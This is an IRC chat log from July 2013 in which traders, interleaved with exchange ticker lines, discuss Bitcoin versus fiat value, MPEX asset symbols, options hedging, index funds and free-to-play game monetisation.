[DMS.SELLING] 190 @ 0.030303 = 5.7576 BTC [-] Jul 08 16:18:37 [BTCTC] [DMS.PURCHASE] 153 @ 0.048994 = 7.4961 BTC [-] Jul 08 16:18:42 ThickAsThieves there is totally btc business cycles. dice corp takes in profits, distributes to shareholders. Jul 08 16:18:44 miners, same thing. Jul 08 16:18:46 it's there. Jul 08 16:19:27 i get that everyone has this personal "o, itams" approach to finance, Jul 08 16:19:40 emptyeddepended: <- Just for you ;) Jul 08 16:19:41 but if you divide the total money supply to the total goods supply you'll get 85`000 dollar apples. Jul 08 16:19:59 most of the economy is NOT goods, and most business cycles are not tangible in that snese. Jul 08 16:20:36 do you disagree that fiat leakage lends to depressing the fiat value of btc? Jul 08 16:20:53 maybe there should be a btc-alliance, businesses that refuse to accept fiat << yeah. there is. everything i do. Jul 08 16:21:19 i disagree that the cost of bitcoin in dollars is relevant for anything but bernanke. Jul 08 16:21:24 it's his problem, let him solve it. Jul 08 16:21:27 [BTCTC] [BASIC-MINING] 10 @ 0.18897 = 1.8897 BTC [+] Jul 08 16:21:54 hehe Jul 08 16:22:28 it may not be relevant to you, but it is relevant to most others Jul 08 16:22:53 "most others" is not an argument. Jul 08 16:23:02 to "most others" whether squirrels are happy is "relevant" Jul 08 16:23:30 calling something irrelevant to yourself does not make it irrelevant Jul 08 16:23:34 this is however vastly irrelevant. squirrels are squirrels and people only matter inasmuch as they manage to treat that which matters rather than that which they "feel" is "relevant" Jul 08 16:23:41 im not calling it irrelevant to myself. Jul 08 16:23:46 i'm calling it irrelevant period. Jul 08 16:24:09 only way to make it appear relevant is through a leap of faith, aka willing suspension of thought. Jul 08 16:24:10 but these are people trying to become squirrels Jul 08 16:24:23 how to live a life of nuts? Jul 08 16:24:27 good for em. lol Jul 08 16:24:41 furries? Jul 08 16:24:45 "nuts fall, everone dies" is there for a reason. Jul 08 16:25:33 i still can't make the jump to fiat value being irrelevant Jul 08 16:25:43 there is no such thing as "fiat value" Jul 08 16:25:43 if i want to live the btc life Jul 08 16:25:47 any more than "circle squaredness" Jul 08 16:26:00 the only way the terms make sense is if you're talking about fiat's value (in Bitcoin) Jul 08 16:26:03 how does the exchange rate not matter? Jul 08 16:26:04 and mixed up the possesive. Jul 08 16:26:09 it does, the other way around. Jul 08 16:26:17 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004799 = 0.0096 BTC [-] Jul 08 16:26:25 so my concern is for the dollar's value Jul 08 16:26:33 fine, Jul 08 16:26:34 why are you not in #dollar-assets then ?! Jul 08 16:26:45 but if i turn all my dollars into btc Jul 08 16:26:49 then what Jul 08 16:26:59 exchange rate still affects my wealth Jul 08 16:27:12 [BTCTC] [ASICMINER-PT] 1 @ 4.427 BTC [+] Jul 08 16:27:20 [BTCTC] [TAT.VIRTUALMINE] 23 @ 0.004619 = 0.1062 BTC [-] Jul 08 16:27:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004618 BTC [-] Jul 08 16:27:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00461 BTC [-] Jul 08 16:27:26 if you turn all your dollars into btc ostensibly political process and government behaviour no longer affects your wealth. Jul 08 16:28:12 but when i must pay my bills and buy things not available in btc, I then look to the exchange rate Jul 08 16:28:15 [BTCTC] [TAT.ASICMINER] 50 @ 0.043011 = 2.1506 BTC [-] Jul 08 16:28:19 it doesnt? So he has to sell his house as well Jul 08 16:28:28 you are saying my complaint is, damn the dollar is worth too much today Jul 08 16:28:29 ThickAsThieves what if you turned all your dollars into land ? Jul 08 16:28:34 would you then not need to pay bills ? Jul 08 16:28:41 generally people keep a little pocket change. Jul 08 16:28:57 i understand that the life of most consists of a daily struggle to produce "A little pocket change". Jul 08 16:29:09 but they make a poor standard, as they're not wealthy or socially needed. Jul 08 16:29:24 so btc is for the wealthy? Jul 08 16:29:31 you know i said it in 2011 Jul 08 16:29:39 and everyone ignored it because welll... they didn't like to hear it. Jul 08 16:30:07 just like i showed the SDRs as the exact equivalent, and people ignored it because well... they never had one so it don't exist. Jul 08 16:30:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.0439 = 0.0878 BTC [+] Jul 08 16:30:39 looking up SDRs.... of course Jul 08 16:30:53 makes you part of the 1%, that. Jul 08 16:31:44 http://www.cryptocoinsnews.com/2013/07/08/iceland-wants-to-adopt-bitcoin-instead-of-their-own-currency-icelandic-krona-isk/ Jul 08 16:32:08 wiki says "Private parties do not hold or use them." Jul 08 16:32:09 headline is to exaggerated though Jul 08 16:32:11 i have my doubts about random muckracking emptyeddepended Jul 08 16:32:16 ThickAsThieves yes. Jul 08 16:32:21 slightly exagerated. Jul 08 16:32:58 what about somalia? ;) Jul 08 16:33:13 nearly 500b in SDR now Jul 08 16:33:30 [BTCTC] [ASICMINER-PT] 1 @ 4.429 BTC [+] Jul 08 16:33:36 [BTCTC] [ASICMINER-PT] 1 @ 4.44 BTC [+] Jul 08 16:33:38 sdrs are for participating states. bitcoin is for participating people. not an exact equivalent, but it does explain well how something can have value and not be exchangeable for groceries Jul 08 16:33:55 for the benefit of people whose income could at most be upset by finding 20 bucks on the sidewalk, Jul 08 16:34:03 and if that'd happen they'd immediately buy groceries. Jul 08 16:34:30 so you don't see bitcoin as a the populous currency of the future? Jul 08 16:34:41 no. and i even said so! Jul 08 16:34:41 but an eventual instrument for the wealthy? Jul 08 16:34:57 i believe yoU! Jul 08 16:35:01 hehe Jul 08 16:35:20 but it's quite interesting to me that no one else does Jul 08 16:35:28 subscribe to that vision that is Jul 08 16:35:48 "no one else" ? Jul 08 16:35:52 well Jul 08 16:35:55 it seems to me you're the only one who doesn't read trilema Jul 08 16:35:55 most Jul 08 16:36:06 i read everything posted anew Jul 08 16:36:11 consider that most in light of the effects of me saying "stop buying" Jul 08 16:36:12 and linked to me Jul 08 16:36:25 i have not gone backward Jul 08 16:36:28 sure, most "people". bitcoin isn't about headcount. Jul 08 16:36:52 well may be an idea to read back becauyse there's some great stuff in 2012. i'd love to find you the exact one but i gotta jet right now Jul 08 16:37:01 np Jul 08 16:37:08 however, it's well discussed there , this future of payments in bitcoin topic. Jul 08 16:39:42 [BTCTC] [DMS.MINING] 5 @ 0.019249 = 0.0962 BTC [-] Jul 08 16:40:38 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [-] Jul 08 16:40:40 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [-] Jul 08 16:40:43 [BTCTC] [ASICMINER-PT] 8 @ 4.322 = 34.576 BTC [-] Jul 08 16:42:25 [BTCTC] [ASICMINER-PT] 1 @ 4.321 BTC [-] Jul 08 16:42:27 [BTCTC] [ASICMINER-PT] 1 @ 4.32 BTC [-] Jul 08 16:42:29 [BTCTC] [ASICMINER-PT] 1 @ 4.301008 BTC [-] Jul 08 16:42:31 [BTCTC] [ASICMINER-PT] 2 @ 4.3005 = 8.601 BTC [-] Jul 08 16:42:48 yes SDR's are a great example Jul 08 16:44:03 [BTCTC] [TAT.ASICMINER] 50 @ 0.043011 = 2.1506 BTC [-] Jul 08 16:44:08 [BTCTC] [TAT.ASICMINER] 20 @ 0.04301 = 0.8602 BTC [-] Jul 08 16:44:10 [BTCTC] [TAT.ASICMINER] 51 @ 0.043002 = 2.1931 BTC [-] Jul 08 16:46:10 I have a doubt about assets nomenclature Jul 08 16:47:18 S.MPOE-PT <-- For example Jul 08 16:47:20 How do you interpret it? Jul 08 16:47:25 So PT means pass through? Jul 08 16:47:28 Or something like that? Jul 08 16:48:19 yes Jul 08 16:48:22 It means exactly that Jul 08 16:48:33 What about the S.MPOE Jul 08 16:48:34 but there is no official name convention Jul 08 16:48:40 is there anything to interpret in it's structure? Jul 08 16:48:42 considering the dot Jul 08 16:48:52 i see Jul 08 16:49:40 well in case of S.DICE it's a short cut for satoshi's dice Jul 08 16:49:47 S in the context of mpex means Security i mean Jul 08 16:49:49 i think Jul 08 16:49:56 [BTCTC] [S.DICE-PT] 7 @ 0.002188 = 0.0153 BTC [-] Jul 08 16:50:03 hence s.mpoe Jul 08 16:50:05 s.bbet Jul 08 16:50:09 s.mg Jul 08 16:50:15 x signifies future Jul 08 16:50:22 hence x.idiff sep Jul 08 16:50:28 o signifies option Jul 08 16:50:34 hence o.usd.c020T Jul 08 16:50:50 thanks for the explanation Jul 08 16:51:05 i think we all went over the symbology last time mp changed it Jul 08 16:51:08 no worries Jul 08 16:51:19 but i guess those are the three asset classes Jul 08 16:51:32 hmmm....i think that the bond has a symbol too, but i can't remember what Jul 08 16:51:39 mpbor or something like that Jul 08 16:52:44 but that is monthly and uses an auction symbol...i forget the details\ Jul 08 16:53:17 or is accepted to people who send in >100 btc with the last 3 digits set to 8 Jul 08 16:53:32 100.00000888 Jul 08 16:53:35 i think Jul 08 16:53:59 now i have a question Jul 08 16:54:06 do the prices of the options adjust daily? Jul 08 16:54:21 does the bot, change them, or have they basically been static (what i am assuming) Jul 08 16:55:06 spammy spammy ;) Jul 08 16:55:57 thanks mjr_ Jul 08 16:56:01 I will look more into this later Jul 08 16:59:14 [BTCTC] [BFMINES] 4 @ 0.00399 = 0.016 BTC [+] Jul 08 16:59:50 [BTCTC] [ASICMINER-PT] 1 @ 4.34 BTC [+] Jul 08 17:00:00 [BTCTC] [ASICMINER-PT] 1 @ 4.321008 BTC [-] Jul 08 17:00:11 [BTCTC] [ASICMINER-PT] 1 @ 4.321 BTC [-] Jul 08 17:00:25 [BTCTC] [ASICMINER-PT] 7 @ 4.32 = 30.24 BTC [-] Jul 08 17:00:26 [BTCTC] [ASICMINER-PT] 1 @ 4.300168 BTC [-] Jul 08 17:01:05 option prices are dynamic Jul 08 17:01:15 i am saying, they are adjusted every day? Jul 08 17:01:27 and open to adjustment like every 10min or so Jul 08 17:01:38 basically, i'll just come out and say it, is time decay built in Jul 08 17:01:40 dynamic to the vwap Jul 08 17:01:45 because to me it doesn't seem like it is Jul 08 17:02:02 just cuz vwap is the same with 30 days left, i shouldn't pay the same as 1 day left Jul 08 17:02:08 [HAVELOCK] [ASICM] 30 @ 0.04234899 = 1.2705 BTC [-] Jul 08 17:02:10 vwap being equal Jul 08 17:02:59 i dont think time decay is built in but its possible his volatility portion of the algo outweights it Jul 08 17:03:12 lol with vol of 300, i guess it dwarfs everything else Jul 08 17:03:17 [HAVELOCK] [ASICM] 22 @ 0.042349 = 0.9317 BTC [+] Jul 08 17:03:32 my point is "are bitcoins magic?" Jul 08 17:03:51 if yes, then i should ignore every mathematical model that the financial world has constructed Jul 08 17:04:10 concepts like theta, gamma and delta are irrelevant Jul 08 17:04:21 and options pricing is sorcery Jul 08 17:04:24 [HAVELOCK] [ASICM] 9 @ 0.04294999 = 0.3865 BTC [+] Jul 08 17:04:30 if they aren't magic Jul 08 17:04:41 then i want to see how they compare against their "muggle" counterparts Jul 08 17:05:16 [HAVELOCK] [ASICM] 4 @ 0.04294999 = 0.1718 BTC [+] Jul 08 17:05:32 that was an oblique reference to a harry potter fan fiction (LOL) in which harry is curious about the arbitrage possiblity between wizard gold and gold on the spot market in the muggle world Jul 08 17:06:37 [BTCTC] [TAT.ASICMINER] 19 @ 0.0431 = 0.8189 BTC [+] Jul 08 17:06:42 add in jewgold and you may have something. Jul 08 17:06:47 hahaha Jul 08 17:06:53 i think it is neither Jul 08 17:07:01 it is new Jul 08 17:07:05 well... Jul 08 17:07:06 somewhat Jul 08 17:07:14 if it looks, acts, and sounds like a currency Jul 08 17:07:22 then i can/should treat it as such Jul 08 17:07:31 an option is an option Jul 08 17:07:42 so i have been applying standard tools to these options Jul 08 17:07:49 and i think i can perhaps offer lower prices Jul 08 17:07:58 but need to test a LOT before i try that Jul 08 17:08:03 so i think what you are really looking for Jul 08 17:08:09 is why you might be wrong Jul 08 17:08:21 or whether* Jul 08 17:08:36 yeah Jul 08 17:08:44 i mean that is my goal, to figure out if there is something here, or not Jul 08 17:09:19 my calculations over the last year on a daily basis (365 data points) show a historical daily volatiltiy of 120 Jul 08 17:09:45 mp chooses not to hedge options, which is perfectly valid Jul 08 17:09:47 but that seems to be too simple Jul 08 17:09:51 to average them Jul 08 17:09:56 its not just an average Jul 08 17:10:01 ok Jul 08 17:10:04 its closer to a standard deviation Jul 08 17:10:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.04301 = 0.3011 BTC [-] Jul 08 17:10:54 or a random walk Jul 08 17:10:56 [BTCTC] [TAT.ASICMINER] 4 @ 0.043499 = 0.174 BTC [+] Jul 08 17:11:12 if you can properly cover your ass, and only intend to offer small amounts in mid-market Jul 08 17:11:17 i think you're okay Jul 08 17:11:21 [BTCTC] [DMS.MINING] 1 @ 0.019 BTC [-] Jul 08 17:11:26 [BTCTC] [CRYPTO-TRADE] 22 @ 0.2 = 4.4 BTC [+] Jul 08 17:11:47 well, if i come up with a strategy that works, and can mathematically be shown where exactly my risks are Jul 08 17:11:53 [BTCTC] [DMS.MINING] 20 @ 0.019 = 0.38 BTC [-] Jul 08 17:11:54 [BTCTC] [DMS.MINING] 65 @ 0.019249 = 1.2512 BTC [+] Jul 08 17:11:56 i would raise money to start market making aggresively Jul 08 17:12:08 perhaps a bond of or something Jul 08 17:12:13 new issues arise if you become a target though Jul 08 17:12:17 true Jul 08 17:12:22 like price manipulation Jul 08 17:12:33 i think this is more similar to a Carry Trade, rather than an arbitrage Jul 08 17:12:35 [BTCTC] [S.MPOE-PT] 4 @ 0.000989 = 0.004 BTC [-] Jul 08 17:14:03 [BTCTC] [TAT.ASICMINER] 46 @ 0.043499 = 2.001 BTC [+] Jul 08 17:14:57 for example, if i borrow yen to lend out dollars (yen is low yield, dollar is higher) that is a classic example Jul 08 17:15:01 seems mor elike gambling to me Jul 08 17:15:17 eh, its really just abstracting the currency and focusing on the market Jul 08 17:15:25 there's no interest to carry here Jul 08 17:15:37 i can get cheap here, and i can lend for more there Jul 08 17:15:42 there is some interest going on Jul 08 17:15:50 but yes, i use 0 as my interest and dividend Jul 08 17:16:02 the premium is, i guess Jul 08 17:16:07 [BTCTC] [DMS.PURCHASE] 27 @ 0.048994 = 1.3228 BTC [-] Jul 08 17:16:08 i was saying similar to, not the same Jul 08 17:16:42 anyways, financial engineering should allow me to abstract away whatever risks i don't want, and focus on the risks i do want, and then collect on those risks Jul 08 17:16:50 [BTCTC] [TAT.ASICMINER] 35 @ 0.043011 = 1.5054 BTC [-] Jul 08 17:17:10 so you'll create an inverse deal on the other end? Jul 08 17:17:18 yes, perhaps not on mpex Jul 08 17:17:22 ah Jul 08 17:17:24 i could have a private deal in place Jul 08 17:17:30 to hedge my option writing Jul 08 17:17:53 for example, let's say i tell my friend i will buy 1000 coins from him at 75 dollars at the end of august Jul 08 17:18:11 in other words, i am long the future Jul 08 17:18:12 but you need both ends to be dynamic right? Jul 08 17:18:28 yes, you have to map out where you are covered and more importantly where you aren't Jul 08 17:18:29 no guarantee of selling all your Puts Jul 08 17:18:34 that is the problem Jul 08 17:18:58 however, you can make some educated guesses Jul 08 17:19:10 1. Options volume used to be higher Jul 08 17:19:18 2. Price went up and options volume dropped Jul 08 17:19:26 you could always base it on the bot's buy price\ Jul 08 17:19:26 3. I know this obvious but higher prices mean less deman Jul 08 17:19:32 as worst case Jul 08 17:19:55 assuming you have some confidence in the bots pricing Jul 08 17:19:57 so hopefully, if it were possible to hedge better, one should be able to offer better prices Jul 08 17:20:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.043899 = 0.0878 BTC [+] Jul 08 17:20:24 i mean, i think the only reason (per trilema) that mp hasn't moved it, is due to the fact no one has jumped into the middle Jul 08 17:20:31 you think? Jul 08 17:21:07 i think that reason is just an extension of one of two possible real reasons Jul 08 17:21:23 first being that MP simply hates being"wrong" Jul 08 17:21:27 even to himself Jul 08 17:21:40 he didnt wanna change the algo when he was losing money Jul 08 17:21:42 well...wrong needs to be defined in this context Jul 08 17:21:43 and then he did Jul 08 17:21:46 and can't make money Jul 08 17:22:03 his stock is at an all time high right now if i remember correctly Jul 08 17:22:04 the second reason, which begs more thought, Jul 08 17:22:08 and he did pay divs Jul 08 17:22:16 but i agree Jul 08 17:22:24 is maybe his own analysis says that lower prices are too risky Jul 08 17:22:26 and why Jul 08 17:22:34 but i agree with the second point Jul 08 17:22:41 if you aren't hedged Jul 08 17:22:44 which: Jul 08 17:23:14 so if more backing bonds were purchased, might he lower prices? Jul 08 17:23:26 or is he simply too worried about flash crashes and such Jul 08 17:23:49 You can't pull yourself up by your breeches and for the very same reason you can't have everybody in the market hedge. Someone needs to provide the support everyone else relies on to hedge. I'm that someone Jul 08 17:23:58 so he has decided to be that someone Jul 08 17:24:11 and that is great, and actually a public service Jul 08 17:24:25 but i have no compunction about hedging Jul 08 17:24:38 the price of public service sure has gone up! Jul 08 17:24:40 :) Jul 08 17:24:49 lol Jul 08 17:25:15 well, if you ask anyone, "what is the riskiest thing you can do in finance?" i think they would say write options without a hedge Jul 08 17:25:41 if you told them that the vol was over 100, they would consider it suicidal (probably) Jul 08 17:25:56 but he has a good model in place to avoid insolvency, but not to avoid loss Jul 08 17:26:19 [BTCTC] [TAT.ASICMINER] 11 @ 0.043899 = 0.4829 BTC [+] Jul 08 17:26:23 [BTCTC] [TAT.ASICMINER] 11 @ 0.043899 = 0.4829 BTC [+] Jul 08 17:26:44 and i don't claim to know better than him, by any means, i haven't written a lot of options and he has Jul 08 17:26:54 didn't smickles used to play midmarket? Jul 08 17:26:59 and at the end of the day, what matters is where you put your money Jul 08 17:27:01 i think he did Jul 08 17:27:02 [BTCTC] [BITVPS] 40 @ 0.001999 = 0.08 BTC [+] Jul 08 17:27:04 i miss smickles Jul 08 17:27:18 i talked to Bugpowder yesterday Jul 08 17:27:25 i think he had some stuff going on too Jul 08 17:27:36 [BTCTC] [AMC-PT] 13 @ 0.001935 = 0.0252 BTC [+] Jul 08 17:27:52 seems odd to disappear without a trace Jul 08 17:28:00 yet leave IRC logging on perpetually Jul 08 17:29:22 [BTCTC] [S.DICE-PT] 9 @ 0.002399 = 0.0216 BTC [+] Jul 08 17:32:18 how does an index stock handle value when new assets are listed/de-listed? Jul 08 17:33:18 ThickAsThieves: he had a baby Jul 08 17:33:25 he emailed me at the start of june Jul 08 17:33:31 but haven't heard from him recently Jul 08 17:33:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.043899 BTC [+] Jul 08 17:33:43 indices usually have a "rebalance" Jul 08 17:33:49 at pre-announced times Jul 08 17:34:02 where they adjust the ratios to keep them in line with the funds stated goals Jul 08 17:34:12 most famous/important the russel imbalance Jul 08 17:34:12 [HAVELOCK] [ASICM] 35 @ 0.04294999 = 1.5032 BTC [+] Jul 08 17:34:31 [BTCTC] [AMC-PT] 25 @ 0.001944 = 0.0486 BTC [+] Jul 08 17:35:39 i actually wish there was more IB stuff in btcland Jul 08 17:35:44 M&A Jul 08 17:36:08 i'm interested in running some index funds eventually Jul 08 17:36:11 [BTCTC] [S.DICE-PT] 1 @ 0.002399 BTC [+] Jul 08 17:36:16 like an MPEX4 or such Jul 08 17:36:23 hehehe Jul 08 17:36:26 :) Jul 08 17:36:35 hopefully it would be an mpex15 at that time Jul 08 17:36:43 i am excited about S.MG Jul 08 17:36:47 me too Jul 08 17:36:52 can't wait to play it Jul 08 17:36:54 i wish i bought more Jul 08 17:37:00 I want to play my game already Jul 08 17:37:02 oh lol, i just want to play it Jul 08 17:37:05 hehe Jul 08 17:37:24 if you read the novel REAMDE you could see the cool applicatoins Jul 08 17:37:35 or you would see those cool ones, you can see other ones without reading it Jul 08 17:37:48 TAT what would you index? Jul 08 17:38:12 well there is more than one idea i have floating Jul 08 17:38:18 jus sayinn: http://www.gamasutra.com/blogs/RaminShokrizade/20130626/194933/ Jul 08 17:38:40 the easiest would be an index fund, where i actually buy 1 of each stock and sell them as 1 index unti Jul 08 17:38:43 unit* Jul 08 17:38:47 on other exchanges Jul 08 17:39:00 you mean like the PT's? Jul 08 17:39:03 right Jul 08 17:39:10 except as an index Jul 08 17:39:10 I have a feeling mircea_popescu thinks of Gamasutra, as a "Fanfic" blog, as MPOE-PR would put it. Jul 08 17:39:19 but all the stocks instead of individualized? Jul 08 17:39:24 right Jul 08 17:39:44 I'd buy it Jul 08 17:39:49 sold! Jul 08 17:39:50 hehe Jul 08 17:40:02 [HAVELOCK] [ASICM] 2 @ 0.04294999 = 0.0859 BTC [+] Jul 08 17:40:05 thestringpuller: I find it to be an interesting article Jul 08 17:40:16 http://en.wikipedia.org/wiki/Hawala this is a fascinating article Jul 08 17:40:44 davout: I love Gamasutra, it's pretty much the news site for game developers. Jul 08 17:41:09 too many links! Jul 08 17:41:12 thestringpuller: didn't know it, actually it's the first time ever I read an article there :-) Jul 08 17:41:23 thestringpuller: you're a game developer . Jul 08 17:41:24 ? Jul 08 17:41:50 he's THE game developer Jul 08 17:42:06 tell me moar Jul 08 17:42:08 No. More like a indie consultant. Jul 08 17:42:52 proceed Jul 08 17:43:08 Did you know the reason the the goombas and koopas change in Super Mario Bros. is because the NES had limited color data. Jul 08 17:43:26 For instance in 1-1 they look "normal" Jul 08 17:43:31 what do you mean by "they change" ? Jul 08 17:43:32 but 1-2 they change to blue Jul 08 17:43:36 hm Jul 08 17:43:39 oh yes Jul 08 17:43:42 like in underworld Jul 08 17:43:45 also the clouds and the bushes are the same sprites Jul 08 17:43:51 i knew this one :-) Jul 08 17:45:01 ThickAsThieves philosophically disagrees with me on S.MG lol Jul 08 17:45:13 that's where dat sarcasm be comin' from Jul 08 17:45:16 if you started a zelda game by calling your character zelda you'd get a whole different quest Jul 08 17:45:25 ah i see Jul 08 17:45:52 i just think your gloom and doom is misplaced or at least disproportionate Jul 08 17:46:01 about S.MG ? Jul 08 17:46:18 about their methodology and path for the current game Jul 08 17:47:04 let's see how the execution rolls out Jul 08 17:47:13 that's my line Jul 08 17:47:15 [HAVELOCK] [ASICM] 5 @ 0.0425 = 0.2125 BTC [-] Jul 08 17:47:22 either outcomes will be positive Jul 08 17:47:32 either i make some money on the S.MG shares Jul 08 17:47:33 string argues that is not good enough Jul 08 17:47:47 or we get to make fun at MP for failing miserably Jul 08 17:47:52 XD Jul 08 17:47:57 fat chance Jul 08 17:48:02 does anyone know if gox yubikeys are locked or can be freely flashed and used for other purposes? Jul 08 17:48:24 MP will likely sweep it under the rug or have a salvage plan. Jul 08 17:48:41 or have a way to portray it as a great success Jul 08 17:48:52 emptyeddepended: http://linux.die.net/man/1/ykpersonalize Jul 08 17:48:52 regardless of anyone else's measure Jul 08 17:48:54 [BTCTC] [DMS.PURCHASE] 58 @ 0.048994 = 2.8417 BTC [-] Jul 08 17:49:09 i'm just looking forward to playing it Jul 08 17:49:14 but in this case i think he'd be right Jul 08 17:49:18 but would you describe it as a "money game" Jul 08 17:49:20 it's a great thing Jul 08 17:49:27 even if it falls flat Jul 08 17:49:33 Super Mario Bros. 3 was a great thing Jul 08 17:49:37 MegaMan 2 was a great thing... Jul 08 17:49:50 zelda 64 best game evar Jul 08 17:49:51 [BTCTC] [TAT.ASICMINER] 25 @ 0.043899 = 1.0975 BTC [+] Jul 08 17:50:12 michael chiklis was not a great thing Jul 08 17:50:31 thestringpuller: i think it is interesting, because similar to WoW you can earn money by playing Jul 08 17:50:47 vs a zynga game where you can only spend Jul 08 17:50:54 You can earn money in any MMO. That's not why the core players play them though... Jul 08 17:51:40 string, what do you think of Rift's current model Jul 08 17:51:43 free to play Jul 08 17:51:48 pay to level up, etc Jul 08 17:52:08 Wow is that game 2 years old already? Jul 08 17:52:24 i dunno Jul 08 17:52:25 Should be subscription/single fee based. Jul 08 17:52:47 I think Rift is what kinda forced a lot of other games hands from the subscription model. Jul 08 17:52:55 they are simply offering what WoW players already pay for through grey markets Jul 08 17:53:02 Or perhaps it's just the "Zynga climate" in general. Jul 08 17:53:25 Cause after Rift came out LotRo and SWTOR became F2P Jul 08 17:53:26 not sure if it's a good thing or bad thinig personally Jul 08 17:53:28 The way it is now, with micropayments games, most play free, a few addicts pay thousands to have everything. Jul 08 17:53:53 Namworld: but what happens when those addicts go to rehab? Jul 08 17:54:12 "rehab" so to speak Jul 08 17:54:17 if you pay for all your stuff do you value the game more or less? Jul 08 17:54:46 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [+] Jul 08 17:54:47 are more likely to move on to a new game or less? Jul 08 17:54:48 rift became F2P a couple of months ago Jul 08 17:54:54 my gf raged about it Jul 08 17:54:54 right Jul 08 17:54:55 :D Jul 08 17:54:58 hehe Jul 08 17:55:01 Last month actually Jul 08 17:55:14 she was all like "fucking noobs gonna flood the servers" Jul 08 17:55:25 What devalues a game is whether or not you're making the gameplay optional or not. Jul 08 17:55:29 And honestly, how fun is a game when to progress, you must pay? Isn't the whole point to entertain yourself with good gameplay and advancement through that gameplay? A subscription for online games and flat fee for offline game is a good model. Jul 08 17:55:31 much like when WoW introduced DKs Jul 08 17:55:38 i was actually quite happy, seeing my chances of getting sandwiches made increase slightly Jul 08 17:55:40 it wasn't THAT bad Jul 08 17:55:51 But whatever, companies are free to release a payment model as they please. Jul 08 17:55:57 Nam you dont HAVE to pay Jul 08 17:56:00 you MAY pay Jul 08 17:56:15 Namworld makes the best point. It has to be fun. You can make any gimmick you want in a game, but people are going to keep playing it. Jul 08 17:56:22 It's like being hooked on crack. Jul 08 17:56:27 it can still be fun Jul 08 17:56:30 No one wants to fucking smoke crack, but it's addictive. Jul 08 17:56:34 when i played WoW, Jul 08 17:56:38 i only enjoyed raiding Jul 08 17:56:40 DK's were fun Jul 08 17:56:47 i despised farming Jul 08 17:56:48 i stopped b4 pandas Jul 08 17:56:52 so i paid for gold Jul 08 17:57:02 [BTCTC] [S.DICE-PT] 190 @ 0.002399 = 0.4558 BTC [+] Jul 08 17:57:03 the one after lich king i think Jul 08 17:57:03 [BTCTC] [S.DICE-PT] 100 @ 0.0024 = 0.24 BTC [+] Jul 08 17:57:07 then i could spend my time playing the dame the way i wanted Jul 08 17:57:14 game* Jul 08 17:57:19 That's MPOE-PR's point. Jul 08 17:57:22 You don't HAVE to pay. But most micropayment games have gameplay made so that if you don't pay, you can't advance, compete or must grind for months on end to acquire "premium" currencies. Jul 08 17:57:33 It really kills the gameplay value Jul 08 17:57:38 But do you know why they make you farm ThickAsThieves? Jul 08 17:57:54 or the original intent Jul 08 17:58:02 to make the game last longer Jul 08 17:58:21 lack of unique content Jul 08 17:58:35 Not entirely, that's half the coin. But they wanted to create a barrier to entry to the end game. Jul 08 17:58:37 [HAVELOCK] [ASICM] 50 @ 0.0429 = 2.145 BTC [+] Jul 08 17:58:39 [HAVELOCK] [ASICM] 45 @ 0.04294999 = 1.9327 BTC [+] Jul 08 17:59:00 seems to be rewording what i said Jul 08 17:59:02 In the same way MP charges 30 BTC to get into MPEX. In order to raid you needed to go through 60+ levels of shit. Jul 08 17:59:25 It does extend your playtime. Jul 08 17:59:31 But a lot of people drop out before they get to the end. Jul 08 17:59:34 but if i want onto mpex i can buy 30btc Jul 08 17:59:42 i dont need to grind Jul 08 17:59:47 [HAVELOCK] [ASICM] 1 @ 0.043989 BTC [+] Jul 08 17:59:49 [HAVELOCK] [ASICM] 52 @ 0.04399 = 2.2875 BTC [+] Jul 08 17:59:50 [HAVELOCK] [ASICM] 322 @ 0.044 = 14.168 BTC [+] Jul 08 17:59:51 [HAVELOCK] [ASICM] 415 @ 0.04444444 = 18.4444 BTC [+] Jul 08 17:59:57 Yea but a lot of people who would want to get into MPEX say "fuck it" and "drop out". Jul 08 18:00:47 [HAVELOCK] [ASICM] 34 @ 0.0446211 = 1.5171 BTC [+] Jul 08 18:00:51 they make you grind because you know, monthly subscription. While when it's payments to advance, it's either pay immediately to go on or drop. Jul 08 18:00:52 if they really want to trade on mpex they just go on coinbr Jul 08 18:01:00 ^ what i was going to say Jul 08 18:01:05 What Namworld said :D Jul 08 18:01:06 could taht be the equivalent of crafting? Jul 08 18:01:27 or like social gaming on WoW Jul 08 18:01:33 hanging out in the town hall Jul 08 18:01:46 stopped gaming at counter strike Jul 08 18:01:46 I mean, there was an interesting article on hats Jul 08 18:01:48 [HAVELOCK] [ASICM] 43 @ 0.044 = 1.892 BTC [-] Jul 08 18:01:51 i think great content and accessibility to it IS what makes a game good Jul 08 18:01:55 [HAVELOCK] [ASICM] 1 @ 0.044 BTC [-] Jul 08 18:01:57 not the reverse Jul 08 18:02:00 The thing is, with payments to advance, few can play, and a few drops big amounts of cash to show off their wealth. Poor gameplay, you just pay to progress. Jul 08 18:02:13 mmorpgs are like alcohol, they cost money, and more importantly they cost time Jul 08 18:02:28 A good game is enjoyable and can be sold to everyone at a cheaper prices. Less money per persons, more players. Jul 08 18:02:40 And usually ends up being a more enjoyable game. Jul 08 18:02:41 i like LoL's idea Jul 08 18:02:47 ThickAsThieves: and that's my point exactly, good content. more generally "fun" Jul 08 18:02:52 WoW did not use the money for this purpose Jul 08 18:02:57 which is for the most part, gameplay free, look cool = money Jul 08 18:03:01 they rake(d) in millions and millions Jul 08 18:03:13 yet new 3d models were rare Jul 08 18:03:16 has anyone here read REAMDE? Jul 08 18:03:22 and new content sporadic Jul 08 18:03:28 WoW actually raked in billions Jul 08 18:03:29 nope Jul 08 18:03:34 even worse Jul 08 18:03:41 that drove me crazy as a player Jul 08 18:03:55 mjr_: isn't that by neal stephenson? Jul 08 18:03:56 seeing the same art on endgame armor and weps Jul 08 18:04:01 recolored Jul 08 18:04:10 thestringpuller: yes Jul 08 18:04:15 and seeing endgame bosses with the same models Jul 08 18:04:28 specifically about "farming" and "in game money" and how it relates to real world Jul 08 18:04:35 the game described is really interesting Jul 08 18:04:40 mjr_: I was told it was Snow Crash but in a different time period... Jul 08 18:05:12 [BTCTC] [ASICMINER-PT] 1 @ 4.351001 BTC [-] Jul 08 18:05:14 [BTCTC] 